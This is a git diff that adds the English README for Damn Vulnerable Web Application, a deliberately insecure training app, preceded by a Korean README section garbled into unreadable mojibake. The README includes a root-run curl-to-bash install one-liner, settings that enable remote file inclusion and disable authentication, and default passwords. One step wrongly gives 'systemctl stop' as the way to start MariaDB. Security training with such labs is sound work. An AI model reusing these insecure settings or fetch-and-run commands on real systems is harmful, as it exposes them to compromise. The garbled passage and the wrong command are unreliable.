ė‹¤í–‰ ė¤‘ė¸ė§€ 확ė¸í•˜ė‹­ė‹œė˜¤. ė´ę˛ƒė€ ėĩœė‹  ëĻ´ëĻŦėŠ¤ę°€ ė•„니ëŧ master 브랜ėš˜ė˜ ėĩœė‹  ėŊ”ë“œėž…니다. + +티ėŧ“ė„ ė œėļœí•  때 다ėŒ ė •ëŗ´ëĨŧ ė ė–´ë„ ė œėļœí•˜ė‹­ė‹œė˜¤: + +- ėš´ė˜ ė˛´ė œ +- ė˜¤ëĨ˜ę°€ 발ėƒí•œ ė§í›„ ė›š ė„œë˛„ ė˜¤ëĨ˜ 로그ė˜ 마ė§€ë§‰ 5ė¤„ +- 데ė´í„°ë˛ ė´ėŠ¤ ė¸ėĻ ëŦ¸ė œė¸ ę˛Ŋėš° ėœ„ė˜ 단ęŗ„ëĨŧ 따ëŧė„œ 각 단ęŗ„ė˜ ėŠ¤íŦëĻ°ėƒˇė„ ė°ė–´ ė œėļœí•˜ė‹­ė‹œė˜¤. ė´ę˛ƒë“¤ė„ 데ė´í„°ë˛ ė´ėŠ¤ ė‚ŦėšŠėž 및 ė•”í˜¸ę°€ 표ė‹œëœ ęĩŦė„ą 파ėŧ ė„šė…˜ė˜ ėŠ¤íŦëĻ°ėƒˇęŗŧ 함ęģ˜ ė œėļœí•˜ė‹­ė‹œė˜¤. +- ëŦ¸ė œę°€ 발ėƒí•œ ėƒí™Šė— 대한 ė™„ė „í•œ ė„¤ëĒ…, 기대하는 동ėž‘ 및 ëŦ¸ė œëĨŧ 해결하기 ėœ„í•´ ė‹œë„í•œ 내ėšŠė— 대한 ė„¤ëĒ…ėž…니다. "로그ė¸ė´ ęŗ ėžĨ나 ėžˆėŒ"만ėœŧ로는 ëŦ¸ė œëĨŧ ė´í•´í•˜ęŗ  해결하는 데 ėļŠëļ„하ė§€ ė•ŠėŠĩ니다. + +- - - + +## 튜토ëĻŦė–ŧ + +ėŧëļ€ ėˇ¨ė•Ŋė ė„ ė‹ëŗ„하ęŗ  ꡸것ė„ 감ė§€í•˜ęŗ  ꡸것ė„ ė•…ėšŠí•˜ëŠ” 방법ė„ ëŗ´ė—ŦėŖŧ는 튜토ëĻŦė–ŧ 비디ė˜¤ëĨŧ 만들ė–´ ëŗ´ę˛ ėŠĩ니다. ė§€ę¸ˆęšŒė§€ ė œėž‘í•œ 튜토ëĻŦė–ŧė€ 다ėŒęŗŧ 같ėŠĩ니다: + +[Reflected XSS ė°žę¸° 및 ė•…ėšŠí•˜ę¸°](https://youtu.be/V4MATqtdxss) + +- - - + +## SQLite3 SQL Injection + +_SQL Injectionęŗŧ Blind SQL Injectionė€ 기ëŗ¸ė ėœŧ로 ė‚Ŧė´íŠ¸ė—ė„œ ė‚ŦėšŠí•˜ëŠ” MariaDB/MySQL ė„œë˛„ė— 대해 ėˆ˜í–‰ëŠë‹ˆë‹¤. ꡸ëŸŦ나 SQLite3ė— 대한 SQL Injection 테ėŠ¤íŠ¸ëĨŧ ėˆ˜í–‰í•  ėˆ˜ë„ ėžˆėŠĩ니다._ + +_SQLite3ëĨŧ PHPė™€ 함ęģ˜ ėž‘동ė‹œí‚¤ëŠ” 방법ė— 대해 다ëŖ¨ė§€ ė•Šę˛ ė§€ë§Œ, `php-sqlite3` 패키ė§€ëĨŧ ė„¤ėš˜í•˜ęŗ  활ė„ąí™”하는 것ėœŧ로 간단히 ė„¤ė •í•  ėˆ˜ ėžˆėŠĩ니다._ + +_ė „í™˜í•˜ę¸° ėœ„í•´ ęĩŦė„ą 파ėŧė„ ėˆ˜ė •í•˜ęŗ  다ėŒ ëŧė¸ė„ ėļ”ę°€í•˜ęą°ë‚˜ 편ė§‘하ė‹­ė‹œė˜¤:_ + +``` +$_DVWA["SQLI_DB"] = "sqlite"; +$_DVWA["SQLITE_DB"] = "sqli.db"; +``` + +_기ëŗ¸ė ėœŧ로 `database/sqli.db` 파ėŧė„ ė‚ŦėšŠí•˜ëŠ°, ëŦ¸ė œę°€ 발ėƒí•˜ëŠ´ 단ėˆœížˆ `database/sqli.db.dist` 파ėŧė„ 덎ė–´ė“°ëŠ´ 됩니다._ + +_도ė „ ęŗŧė œëŠ” MySQLęŗŧ ė •í™•ížˆ 동ėŧ하며, SQLite3ė—ė„œ ė‹¤í–‰ëŠë‹ˆë‹¤._ + +- - - + +👨‍đŸ’ģ 기ė—Ŧėž +----- + +_ëĒ¨ë“  기ė—Ŧ하ė‹  ëļ„들ęģ˜ 감ė‚Ŧ드ëĻŊ니다. :heart:_ + +_ė•„ė´ë””ė–´, 개ė„  ė‚Ŧ항 또는 단ėˆœížˆ 협ë Ĩ하ęŗ ėž 하ė‹œëŠ´ ė–¸ė œë“ ė§€ 기ė—Ŧ하ęŗ  프로ė íŠ¸ė— ė°¸ė—Ŧ할 ėˆ˜ ėžˆėŠĩ니다. PRė„ ëŗ´ë‚´ ėŖŧė‹œę¸° 바랍니다._ + +

+ + + +

+ +- - - + +## ėˇ¨ė•Ŋė  ëŗ´ęŗ  + +_간단히 말해ė„œ, ëļ€ë”” ꡸ëŸŦė§€ 마ė‹­ė‹œė˜¤!_ + +_매년 누ęĩ°ę°€ę°€ ė•ąė—ė„œ 발ę˛Ŧ한 ėˇ¨ė•Ŋė ė„ ëŗ´ęŗ í•˜ëŠ” ę˛Ŋėš°ę°€ ėžˆėŠĩ니다. ė–´ë–¤ 것ė€ ėž˜ ė“°ė—Ŧė§„ ëŗ´ęŗ ė„œė´ëŠ° ėœ ëŖŒ 펜 테ėŠ¤íŠ¸ ëŗ´ęŗ ė„œëŗ´ë‹¤ 나ė„ 때도 ėžˆėŠĩ니다. ė–´ë–¤ 것ė€ ꡸ė € "헤더가 누ëŊ되ė—ˆėŠĩ니다, ė œę˛Œ 돈ė„ ėŖŧė„¸ėš”"ėž…니다._ + +_2023년ė—ëŠ” 누ęĩ°ę°€ę°€ CVE ėš”ė˛­ė„ í†ĩ해 하나ė˜ ėˇ¨ė•Ŋė ė— 대한 CVEëĨŧ 받ė•˜ėŠĩ니다. 그들ė—ę˛Œ [CVE-2023-39848](https://nvd.nist.gov/vuln/detail/CVE-2023-39848)가 ëļ€ė—Ŧ되ė—ˆėŠĩ니다. 많ė€ ėžŦ미ėžˆëŠ” ėŧė´ ėŧė–´ë‚˜ęŗ  ė‹œę°„ė´ ė†Œëš„되ė—ˆėŠĩ니다._ + +_ė•ąė—ëŠ” ėˇ¨ė•Ŋė ė´ ėžˆėŠĩ니다. ė´ëŠ” ęŗ ė˜ėž…니다. 대ëļ€ëļ„ė€ ęĩí›ˆėœŧ로 ėž‘동하는 ėž˜ ė•Œë ¤ė§„ 것들ė´ëŠ°, 다ëĨ¸ 것들ė€ "ėˆ¨ę˛¨ė§„" 것들ėž…니다. 당ė‹ ė˜ 기ėˆ ëĄœ ėˆ¨ę˛¨ė§„ ėļ”ę°€ 기ëŠĨė„ ė°žė•„ë‚´ęŗ  ė‹ļ다면, 블로그 íŦėŠ¤íŠ¸ëĨŧ ėž‘ė„ąí•˜ęą°ë‚˜ 비디ė˜¤ëĨŧ 만들ė–´ ė°žė€ 방법 및 ė´ë“¤ė„ ė•Œė•„ëŗ´ëŠ” ė‚Ŧ람들ė´ ėžˆė„ ėˆ˜ ėžˆėŠĩ니다. ėš°ëĻŦė—ę˛Œ 링íŦëĨŧ ëŗ´ë‚´ėŖŧė‹œëŠ´ ė°¸ėĄ° ëĒŠëĄė— íŦ함할 ėˆ˜ë„ ėžˆėŠĩ니다._ + +## 링íŦ + +프로ė íŠ¸ 홈: + +*DVWA 팀 ė œėž‘* \ No newline at end of file diff --git a/DVWA/README.md b/DVWA/README.md new file mode 100644 index 00000000..cf05d88e --- /dev/null +++ b/DVWA/README.md @@ -0,0 +1,748 @@ +# DAMN VULNERABLE WEB APPLICATION + +Damn Vulnerable Web Application (DVWA) is a PHP/MariaDB web application that is damn vulnerable. Its main goal is to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and to aid both students & teachers to learn about web application security in a controlled class room environment. + +The aim of DVWA is to **practice some of the most common web vulnerabilities**, with **various levels of difficulty**, with a simple straightforward interface. +Please note, there are **both documented and undocumented vulnerabilities** with this software. This is intentional. You are encouraged to try and discover as many issues as possible. +- - - + +## WARNING! + +Damn Vulnerable Web Application is damn vulnerable! **Do not upload it to your hosting provider's public html folder or any Internet facing servers**, as they will be compromised. It is recommended using a virtual machine (such as [VirtualBox](https://www.virtualbox.org/) or [VMware](https://www.vmware.com/)), which is set to NAT networking mode. Inside a guest machine, you can download and install [XAMPP](https://www.apachefriends.org/) for the web server and database. + +### Disclaimer + +We do not take responsibility for the way in which any one uses this application (DVWA). We have made the purposes of the application clear and it should not be used maliciously. We have given warnings and taken measures to prevent users from installing DVWA on to live web servers. If your web server is compromised via an installation of DVWA, it is not our responsibility, it is the responsibility of the person/s who uploaded and installed it. + +- - - + +## License + +This file is part of Damn Vulnerable Web Application (DVWA). + +Damn Vulnerable Web Application (DVWA) is free software: you can redistribute it and/or modify +it under the terms of the GNU General Public License as published by +the Free Software Foundation, either version 3 of the License, or +(at your option) any later version. + +Damn Vulnerable Web Application (DVWA) is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with Damn Vulnerable Web Application (DVWA). If not, see . + +- - - + +## Internationalisation + +This file is available in multiple languages: + +- Arabic: [اŲ„ØšØąØ¨ŲŠØŠ](README.ar.md) +- Chinese: [įŽ€äŊ“中文](README.zh.md) +- French: [Français](README.fr.md) +- Korean: [한ęĩ­ė–´](README.ko.md) +- Persian: [ŲØ§ØąØŗی](README.fa.md) +- Polish: [Polski](README.pl.md) +- Portuguese: [PortuguÃĒs](README.pt.md) +- Spanish: [EspaÃąol](README.es.md) +- Turkish: [TÃŧrkçe](README.tr.md) +- Indonesia: [Indonesia](README.id.md) +- Vietnamese: [Vietnamese](README.vi.md) +- Italian: [Italiano](README.it.md) + +If you would like to contribute a translation, please submit a PR. Note though, this does not mean just run it through Google Translate and send that in, those will be rejected. Submit your translated version by adding a new 'README.xx.md' file where xx is the two-letter code of your desired language (based on [ISO 639-1](https://en.wikipedia.org/wiki/List_of_ISO_639-1_codes)). + +- - - + +## Download + +While there are various versions of DVWA around, the only supported version is the latest source from the official GitHub repository. You can either clone it from the repo: + +```sh +git clone https://github.com/digininja/DVWA.git +``` + +Or [download a ZIP of the files](https://github.com/digininja/DVWA/archive/master.zip). + +- - - + +## Installation + +### Automated Installation 🛠ī¸ + +**Note, this is not an official DVWA script, it was written by [IamCarron](https://github.com/iamCarron/). A lot of work went into creating the script and, when it was created, it did not do anything malicious, however it is recommended you review the script before blindly running it on your system, just in case. Please report any bugs to [IamCarron](https://github.com/iamCarron/), not here.** + +An automated configuration script for DVWA on Debian-based machines, including Kali, Ubuntu, Kubuntu, Linux Mint, Zorin OS... + +**Note: This script requires root privileges and is tailored for Debian-based systems. Ensure you are running it as the root user.** + +#### Installation Requirements + +- **Operating System:** Debian-based system (Kali, Ubuntu, Kubuntu, Linux Mint, Zorin OS) +- **Privileges:** Execute as root user + +#### Installation Steps + +##### One-Liner + +This will download an install script written by [@IamCarron](https://github.com/IamCarron) and run it automatically. This would not be included here if we did not trust the author and the script as it was when we reviewed it, but there is always the chance of someone going rogue, and so if you don't feel safe running someone else's code without reviewing it yourself, follow the manual process and you can review it once downloaded. + +```sh +sudo bash -c "$(curl --fail --show-error --silent --location https://raw.githubusercontent.com/IamCarron/DVWA-Script/main/Install-DVWA.sh)" +``` + +##### Manually Running the Script + +1. **Download the script:** + + ```sh + wget https://raw.githubusercontent.com/IamCarron/DVWA-Script/main/Install-DVWA.sh + ``` + +2. **Make the script executable:** + + ```sh + chmod +x Install-DVWA.sh + ``` + +3. **Run the script as root:** + + ```sh + sudo ./Install-DVWA.sh + ``` + +### Installation Videos + +- [Installing DVWA on Kali running in VirtualBox](https://www.youtube.com/watch?v=WkyDxNJkgQ4) +- [Installing DVWA on Windows using XAMPP](https://youtu.be/Yzksa_WjnY0) +- [Installing Damn Vulnerable Web Application (DVWA) on Windows 10](https://www.youtube.com/watch?v=cak2lQvBRAo) + +### Windows + XAMPP + +The easiest way to install DVWA is to download and install [XAMPP](https://www.apachefriends.org/) if you do not already have a web server setup. + +XAMPP is a very easy to install Apache Distribution for Linux, Solaris, Windows and Mac OS X. The package includes the Apache web server, MySQL, PHP, Perl, a FTP server and phpMyAdmin. + +This [video](https://youtu.be/Yzksa_WjnY0) walks you through the installation process for Windows but it should be similar for other OSs. + +### Docker + +Thanks to [hoang-himself](https://github.com/hoang-himself) and [JGillam](https://github.com/JGillam), every commit to the `master` branch causes a Docker image to be built and ready to be pulled down from GitHub Container Registry. + +For more information on what you are getting, you can browse [the prebuilt Docker images](https://github.com/digininja/DVWA/pkgs/container/dvwa). + +#### Getting Started + +Prerequisites: Docker and Docker Compose. + +- If you are using Docker Desktop, both of these should be already installed. +- If you prefer Docker Engine on Linux, make sure to follow their [installation guide](https://docs.docker.com/engine/install/#server). + +**We provide support for the latest Docker release as shown above.** +If you are using Linux and the Docker package that came with your package manager, it will probably work too, but support will only be best-effort. + +Upgrading Docker from the package manager version to upstream requires that you uninstall the old versions as seen in their manuals for [Ubuntu](https://docs.docker.com/engine/install/ubuntu/#uninstall-old-versions), [Fedora](https://docs.docker.com/engine/install/fedora/#uninstall-old-versions) and others. +Your Docker data (containers, images, volumes, etc.) should not be affected, but in case you do run into a problem, make sure to [tell Docker](https://www.docker.com/support) and use search engines in the mean time. + +Then, to get started: + +1. Run `docker version` and `docker compose version` to see if you have Docker and Docker Compose properly installed. You should be able to see their versions in the output. + + For example: + + ```text + >>> docker version + Client: + [...] + Version: 23.0.5 + [...] + + Server: Docker Desktop 4.19.0 (106363) + Engine: + [...] + Version: 23.0.5 + [...] + + >>> docker compose version + Docker Compose version v2.17.3 + ``` + + If you don't see anything or get a command not found error, follow the prerequisites to setup Docker and Docker Compose. + +2. Clone or download this repository and extract (see [Download](#download)). +3. Open a terminal of your choice and change its working directory into this folder (`DVWA`). +4. Run `docker compose up -d`. + +DVWA is now available at `http://localhost:4280`. + +**Notice that for running DVWA in containers, the web server is listening on port 4280 instead of the usual port of 80.** +For more information on this decision, see [I want to run DVWA on a different port](#i-want-to-run-dvwa-on-a-different-port). + +#### Local Build + +If you made local changes and want to build the project from local, go to `compose.yml` and change `pull_policy: always` to `pull_policy: build`. + +Running `docker compose up -d` should trigger Docker to build an image from local regardless of what is available in the registry. + +See also: [`pull_policy`](https://github.com/compose-spec/compose-spec/blob/master/05-services.md#pull_policy). + +#### Serve local files + +If your making local changes and don't want to build the project for every change : +1. Go to `compose.yml` and uncomment : + ``` + # volumes: + # - ./:/var/www/html + ``` +2. Run `cp config/config.inc.php.dist config/config.inc.php` to copy the default config file. +3. Run `docker compose up -d` and changes to local files will reflect on the container. + +### PHP Versions + +Ideally you should be using the latest stable version of PHP as that is the version that this app will be developed and tested on. + +Support will not be given for anyone trying to use PHP 5.x. + +Versions less than 7.3 have known issues that will cause problems, most of the app will work, but random things may not. Unless you have a very good reason for using such an old version, support will not be given. + +### Linux Packages + +If you are using a Debian based Linux distribution, you will need to install the following packages _(or their equivalent)_: + +- apache2 +- libapache2-mod-php +- mariadb-server +- mariadb-client +- php php-mysqli +- php-gd + +I would recommend doing an update before this, just so you make sure you are going to get the latest version of everything. + +```sh +apt update +apt install -y apache2 mariadb-server mariadb-client php php-mysqli php-gd libapache2-mod-php +``` + +The site will work with MySQL instead of MariaDB but we strongly recommend MariaDB as it works out of the box whereas you have to make changes to get MySQL to work correctly. + +### Apache Modules + +If you want to use the API lab you must have the Apache module `mod_rewrite` enabled. To do this in Linux run: + +``` +a2enmod rewrite +``` + +And then restart Apache with: + +``` +apachectl restart +``` + +### Vendor Files + +If you want to use the API module you will need to install a set of vendor files using [Composer](https://getcomposer.org/). + +First, make sure you have Composer installed. There seem to be backward compatibility issues so I always get the latest version from here: + +https://getcomposer.org/doc/00-intro.md + +Follow the instructions the site gives to get it installed. + +Now go into the `vulnerabilities/api` directory and run: + +``` +composer.phar install +``` + +If you did not install Composer to the system path, make sure you reference its full location. + +## Configurations + +### Config File + +DVWA ships with a dummy copy of its config file which you will need to copy into place and then make the appropriate changes. On Linux, assuming you are in the DVWA directory, this can be done as follows: + +`cp config/config.inc.php.dist config/config.inc.php` + +On Windows, this can be a bit harder if you are hiding file extensions, if you are unsure about this, this blog post explains more about it: + +[How to Make Windows Show File Extensions](https://www.howtogeek.com/205086/beginner-how-to-make-windows-show-file-extensions/) + +### Config with environment variables + +Instead of modifying the configuration file, you can also set most settings using environment variables. In a Docker or Kubernetes deployment, this allows you to modify the configuration without creating a new Docker image. You'll find the variables in the [config/config.inc.php.dist](config/config.inc.php.dist) file. + +If you want to set the default security level to "low", simply add the following line to the [compose.yml](./compose.yml) file: + +```yml +environment: + - DB_SERVER=db + - DEFAULT_SECURITY_LEVEL=low +``` + +### Database Setup + +To set up the database, simply click on the `Setup DVWA` button in the main menu, then click on the `Create / Reset Database` button. This will create / reset the database for you with some data in. + +If you receive an error while trying to create your database, make sure your database credentials are correct within `./config/config.inc.php`. _This differs from config.inc.php.dist, which is an example file._ + +The variables are set to the following by default: + +```php +$_DVWA[ 'db_server'] = '127.0.0.1'; +$_DVWA[ 'db_port'] = '3306'; +$_DVWA[ 'db_user' ] = 'dvwa'; +$_DVWA[ 'db_password' ] = 'p@ssw0rd'; +$_DVWA[ 'db_database' ] = 'dvwa'; +``` + +Note, if you are using MariaDB rather than MySQL (MariaDB is default in Kali), then you can't use the database root user, you must create a new database user. To do this, connect to the database as the root user then use the following commands: + +```mariadb +MariaDB [(none)]> create database dvwa; +Query OK, 1 row affected (0.00 sec) + +MariaDB [(none)]> create user dvwa@localhost identified by 'p@ssw0rd'; +Query OK, 0 rows affected (0.01 sec) + +MariaDB [(none)]> grant all on dvwa.* to dvwa@localhost; +Query OK, 0 rows affected (0.01 sec) + +MariaDB [(none)]> flush privileges; +Query OK, 0 rows affected (0.00 sec) +``` + +### Disable Authentication + +Some tools don't work well with authentication so can't be used with DVWA. To get around this, there is a config option to disable authentication checking. To do this, simply set the following in the config file: + +```php +$_DVWA[ 'disable_authentication' ] = true; +``` + +You will also need to set the security level to one that is appropriate to the testing you want to do: + +```php +$_DVWA[ 'default_security_level' ] = 'low'; +``` + +In this state, you can access all the features without needing to log in and set any cookies. + +### Folder Permissions + +- `./hackable/uploads/` - Needs to be writeable by the web service (for File Upload). + +### PHP Configuration + +On Linux systems, likely found in `/etc/php/x.x/fpm/php.ini` or `/etc/php/x.x/apache2/php.ini`. + +- To allow Remote File Inclusions (RFI): + - `allow_url_include = on` [[allow_url_include](https://secure.php.net/manual/en/filesystem.configuration.php#ini.allow-url-include)] + - `allow_url_fopen = on` [[allow_url_fopen](https://secure.php.net/manual/en/filesystem.configuration.php#ini.allow-url-fopen)] + +- To make sure PHP shows all error messages: + - `display_errors = on` [[display_errors](https://secure.php.net/manual/en/errorfunc.configuration.php#ini.display-errors)] + - `display_startup_errors = on` [[display_startup_errors](https://secure.php.net/manual/en/errorfunc.configuration.php#ini.display-startup-errors)] + +Make sure you restart the php service or Apache after making the changes. + +### reCAPTCHA + +This is only required for the "Insecure CAPTCHA" lab, if you aren't playing with that lab, you can ignore this section. + +Generated a pair of API keys from . + +These then go in the following sections of `./config/config.inc.php`: + +- `$_DVWA[ 'recaptcha_public_key' ]` +- `$_DVWA[ 'recaptcha_private_key' ]` + +### Default Credentials + +**Default username = `admin`** + +**Default password = `password`** + +_...can easily be brute forced ;)_ + +Login URL: + +_Note: This will be different if you installed DVWA into a different directory._ + +- - - + +## Troubleshooting + +These assume you are on a Debian based distro, such as Debian, Ubuntu and Kali. For other distros, follow along, but update the command where appropriate. + +If you'd rather watch a video than read words, the most common issues are covered in the video [Fixing DVWA Setup Issues](https://youtu.be/C-kig5qrPSA?si=_a4Bop505-1tXb_F). + +### Containers + +#### I want to access the logs + +If you are using Docker Desktop, logs can be accessed from the graphical application. +Some minor details may change with newer versions, but the access method should be the same. + +![Overview of DVWA compose](./docs/graphics/docker/overview.png) +![Viewing DVWA logs](docs/graphics/docker/detail.png) + +Logs can also be accessed from the terminal. + +1. Open a terminal and change its working directory to DVWA +2. Show the merged logs + + ```sh + docker compose logs + ``` + + In case you want to export the logs to a file, e.g. `dvwa.log` + + ```sh + docker compose logs > dvwa.log + ``` + +#### I want to run DVWA on a different port + +We don't use port 80 by default for a few reasons: + +- Some users might already be running something on port 80. +- Some users might be using a rootless container engine (like Podman), and 80 is a privileged port (< 1024). Additional configuration (e.g. setting `net.ipv4.ip_unprivileged_port_start`) is required, but you will have to research on your own. + +You can expose DVWA on a different port by changing the port binding in the `compose.yml` file. +For example, you can change + +```yml +ports: + - 127.0.0.1:4280:80 +``` + +to + +```yml +ports: + - 127.0.0.1:8806:80 +``` + +DVWA is now accessible at `http://localhost:8806`. + +In cases in which you want DVWA to not only be accessible exclusively from your own device, but +on your local network too (e.g. because you are setting up a test machine for a workshop), you +can remove the `127.0.0.1:` from the port mapping (or replace it with you LAN IP). This way it +will listen on all available device. The safe default should always be to only listen on your +local loopback device. After all, it is a damn vulnerable web application, running on your machine. + +#### DVWA auto starts when Docker runs + +The included [`compose.yml`](./compose.yml) file automatically runs DVWA and its database when Docker starts. + +To disable this, you can delete or comment out the `restart: unless-stopped` lines in the [`compose.yml`](./compose.yml) file. + +If you want to disable this behavior temporarily, you can run `docker compose stop`, or use Docker Desktop, find `dvwa` and click Stop. +Additionally, you can delete the containers, or run `docker compose down`. + +### Log files + +On Linux systems Apache generates two log files by default, `access.log` and `error.log` and on Debian based system these are usually found in `/var/log/apache2/`. + +When submitting error reports, problems, anything like that, please include at least the last five lines from each of these files. On Debian based systems you can get these like this: + +```sh +tail -n 5 /var/log/apache2/access.log /var/log/apache2/error.log +``` + +### I browsed to the site and got a 404 or Apache2 default page + +[Video Help](https://youtu.be/C-kig5qrPSA?si=wTS3Aj8fycW3Idfr&t=141) + +If you are having this problem you need to understand file locations. By default, the Apache document root (the place it starts looking for web content) is `/var/www/html`. If you put the file `hello.txt` in this directory, to access it you would browse to `http://localhost/hello.txt`. + +If you created a directory and put the file in there - `/var/www/html/mydir/hello.txt` - you would then need to browse to `http://localhost/mydir/hello.txt`. + +Linux is by default case sensitive and so in the example above, if you tried to browse to any of these, you would get a `404 Not Found`: + +- `http://localhost/MyDir/hello.txt` +- `http://localhost/mydir/Hello.txt` +- `http://localhost/MYDIR/hello.txt` + +How does this affect DVWA? Most people use git to clone DVWA into `/var/www/html`, this gives them the directory `/var/www/html/DVWA/` with all the DVWA files inside it. They then browse to `http://localhost/` and get either a `404` or the default Apache welcome page. As the files are in DVWA, you must browse to `http://localhost/DVWA`. + +The other common mistake is to browse to `http://localhost/dvwa` which will give a `404` because `dvwa` is not `DVWA` as far as Linux directory matching is concerned. + +So after setup, if you try to visit the site and get a `404`, think about where you installed the files to, where they are relative to the document root, and what the case of the directory you used is. + +### I browsed to the site and got a blank screen + +[Video Help](https://youtu.be/C-kig5qrPSA?si=wTS3Aj8fycW3Idfr&t=243) + +This is usually one configuration issue hiding another issue. By default, PHP does not display errors, and so if you forgot to turn error display on during the setup process, any other problems, such as failure to connect to the database, will stop the app from loading but the message to tell you what is wrong will be hidden. + +To fix this, make sure you set `display_errors` and `display_startup_errors` as covered in [PHP Configuration](#php-configuration) and then restart Apache. + +### "Access denied" running setup + +If you see the following when running the setup script it means the username or password in the config file do not match those configured on the database. [Video Help](https://youtu.be/C-kig5qrPSA?si=_a4Bop505-1tXb_F&t=973) + +```mariadb +Database Error #1045: Access denied for user 'notdvwa'@'localhost' (using password: YES). +``` + +The error is telling you that you are using the username `notdvwa`. + +The following error says you have pointed the config file at the wrong database. [Video Help](https://youtu.be/C-kig5qrPSA?si=_a4Bop505-1tXb_F&t=630) + +```mariadb +SQL: Access denied for user 'dvwa'@'localhost' to database 'notdvwa' +``` + +It is saying that you are using the user `dvwa` and trying to connect to the database `notdvwa`. + +The first thing to do is to double check what you think you put in the config file is what is actually there. + +If it matches what you expect, the next thing to do is to check you can log in as the user on the command line. Assuming you have a database user of `dvwa` and a password of `p@ssw0rd`, run the following command: + +```sh +mysql -u dvwa -pp@ssw0rd -D dvwa +``` + +_Note: There is no space after the -p_ + +If you see the following, the password is correct: + +```mariadb +Welcome to the MariaDB monitor. Commands end with ; or \g. +Your MariaDB connection id is 14 +Server version: 10.3.22-MariaDB-0ubuntu0.19.10.1 Ubuntu 19.10 + +Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others. + +Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. + +MariaDB [dvwa]> +``` + +As you can connect on the command line, it is likely something wrong in the config file, double check that and then raise an issue if you still can't get things working. + +If you see the following, the username or password you are using is wrong. Repeat the [Database Setup](#database-setup) steps and make sure you use the same username and password throughout the process. + +```mariadb +ERROR 1045 (28000): Access denied for user 'dvwa'@'localhost' (using password: YES) +``` + +If you get the following, the user credentials are correct but the user does not have access to the database. Again, repeat the setup steps and check the database name you are using. + +```mariadb +ERROR 1044 (42000): Access denied for user 'dvwa'@'localhost' to database 'dvwa' +``` + +The final error you could get is this: + +```mariadb +ERROR 2002 (HY000): Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2) +``` + +This is not an authentication issue but tells you that the database server is not running. Start it with the following + +```sh +sudo service mysql start +``` + +### Connection Refused + +[Video Help](https://youtu.be/C-kig5qrPSA?si=_a4Bop505-1tXb_F&t=444) + +An error similar to this one: + +```mariadb +Fatal error: Uncaught mysqli_sql_exception: Connection refused in /var/sites/dvwa/non-secure/htdocs/dvwa/includes/dvwaPage.inc.php:535 +``` + +Means your database server is not running or you've got the wrong IP address in the config file. + +Check this line in the config file to see where the database server is expected to be: + +```php +$_DVWA[ 'db_server' ] = '127.0.0.1'; +``` + +Then go to this server and check that it is running. In Linux this can be done with: + +```sh +systemctl status mariadb.service +``` + +And you are looking for something like this, the important bit is that it says `active (running)`. + +```sh +● mariadb.service - MariaDB 10.5.19 database server + Loaded: loaded (/lib/systemd/system/mariadb.service; enabled; preset: enabled) + Active: active (running) since Thu 2024-03-14 16:04:25 GMT; 1 week 5 days ago +``` + +If it is not running, you can start it with: + +```sh +sudo systemctl stop mariadb.service +``` + +Note the `sudo` and make sure you put your Linux user password in if requested. + +In Windows, check the status in the XAMPP console. + +### Unknown authentication method + +With the most recent versions of MySQL, PHP can no longer talk to the database in its default configuration. If you try to run the setup script and get the following message it means you have configuration. + +```mariadb +Database Error #2054: The server requested authentication method unknown to the client. +``` + +You have two options, the easiest is to uninstall MySQL and install MariaDB. The following is the official guide from the MariaDB project: + + + +Alternatively, follow these steps: + +1. As root, edit the following file: `/etc/mysql/mysql.conf.d/mysqld.cnf` +1. Under the line `[mysqld]`, add the following: + `default-authentication-plugin=mysql_native_password` +1. Restart the database: `sudo service mysql restart` +1. Check the authentication method for your database user: + + ```sql + mysql> select Host,User, plugin from mysql.user where mysql.user.User = 'dvwa'; + +-----------+------------------+-----------------------+ + | Host | User | plugin | + +-----------+------------------+-----------------------+ + | localhost | dvwa | caching_sha2_password | + +-----------+------------------+-----------------------+ + 1 rows in set (0.00 sec) + ``` + +1. You'll likely see `caching_sha2_password`. If you do, run the following command: + + ```sql + mysql> ALTER USER dvwa@localhost IDENTIFIED WITH mysql_native_password BY 'p@ssw0rd'; + ``` + +1. Re-running the check, you should now see `mysql_native_password`. + + ```sql + mysql> select Host,User, plugin from mysql.user where mysql.user.User = 'dvwa'; + +-----------+------+-----------------------+ + | Host | User | plugin | + +-----------+------+-----------------------+ + | localhost | dvwa | mysql_native_password | + +-----------+------+-----------------------+ + 1 row in set (0.00 sec) + ``` + +After all that, the setup process should now work as normal. + +If you want more information see the following page: . + +### Database Error #2002: No such file or directory + +The database server is not running. In a Debian based distro this can be done with: + +```sh +sudo service mysql start +``` + +### Errors "MySQL server has gone away" and "Packets out of order" + +There are a few reasons you could be getting these errors, but the most likely is the version of database server you are running is not compatible with the version of PHP. + +This is most commonly found when you are running the latest version of MySQL as PHP and it do not get on well. Best advice, ditch MySQL and install MariaDB as this is not something we can support. + +For more information, see: + + + +### Why can't the database connect on CentOS? + +You may be running into problems with SELinux. Either disable SELinux or run this command to allow the web server to talk to the database: + +```sh +setsebool -P httpd_can_network_connect_db 1 +``` + +### Anything Else + +For the latest troubleshooting information please read both open and closed tickets in the git repo: + + + +Before submitting a ticket, please make sure you are running the latest version of the code from the repo. This is not the latest release, this is the latest code from the master branch. + +If raising a ticket, please submit at least the following information: + +- Operating System +- The last 5 lines from the web server error log directly after whatever error you are reporting occurs +- If it is a database authentication problem, go through the steps above and screenshot each step. Submit these along with a screenshot of the section of the config file showing the database user and password. +- A full description of what is going wrong, what you expect to happen, and what you have tried to do to fix it. "login broken" is no enough for us to understand your problem and to help fix it. + +- - - + +## Tutorials + +I am going to try to put together some tutorial videos that walk through some of the vulnerabilities and show how to detect them and then how to exploit them. Here are the ones I've made so far: + +[Finding and Exploiting Reflected XSS](https://youtu.be/V4MATqtdxss) + +- - - + +## SQLite3 SQL Injection + +_Support for this is limited, before raising issues, please ensure you are prepared to work on debugging, do not simply claim "it does not work"._ + +By default, SQLi and Blind SQLi are done against the MariaDB/MySQL server used by the site but it is possible to switch to do the SQLi testing against SQLite3 instead. + +I am not going to cover how to get SQLite3 working with PHP, but it should be a simple case of installing the `php-sqlite3` package and making sure it is enabled. + +To make the switch, simply edit the config file and add or edit these lines: + +```php +$_DVWA["SQLI_DB"] = "sqlite"; 